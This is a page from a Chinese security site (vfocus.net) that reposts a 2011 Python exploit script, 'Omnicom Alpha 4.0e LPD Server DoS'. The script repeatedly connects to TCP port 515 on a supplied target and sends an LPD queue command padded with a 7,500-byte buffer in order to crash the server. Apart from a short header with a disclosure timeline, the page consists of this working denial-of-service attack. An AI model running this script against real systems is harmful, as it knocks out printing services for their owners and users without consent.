首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Omnicom Alpha 4.0e LPD Server DoS
来源:vfocus.net 作者:Craig 发布时间:2011-08-04  

#!/usr/bin/python
#Title: Omnicom Alpha 4.0e LPD Server DoS
#Author: Craig Freyman (@cd1zz)
#Software Download: http://www.omnicomtech.com/download/bin/lpd.exe
#Tested on: Windows XP SP3 (English), Server 2003 SP2 (English)
#Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011
#Notes: For this exploit to work, you must know the name of a printer queue on the server.

import socket,sys,time

if len(sys.argv) < 3:
 print "[-]Usage: %s <target addr> <queue name>" % sys.argv[0]
 sys.exit(0)

target = sys.argv[1]
queue = sys.argv[2]

counter = 1
crash = "\x41" * 7500

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
 while counter<=50:
  print "[*] Left jab "+str(counter)+" times."
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect((target,515))
  s.send("\x02"+queue+" "+crash+"LF")
  time.sleep(.25)
  counter+=1
except:
     print "[-] "+target+" has been knocked out with a right hook!"
     sys.exit(0)



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zinf Audio Player v2.2.1 PLS F
·am4ss v1.1 Remote Code Executi
·cPanel 11.x (Fantastico) Local
·ABBS Audio Media Player v3.0 B
·CA Arcserve D2D GWT RPC Creden
·ABBS Electronic Flashcards v2.
·FreeAmp 2.0.7 .fat Buffer Over
·Sun/Oracle GlassFish Server Au
·Actfax FTP Server <= v4.27 USE
·Net112企业建站系统遍历目录和后
·PXE exploit server
·Citrix XenApp / XenDesktop XML
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved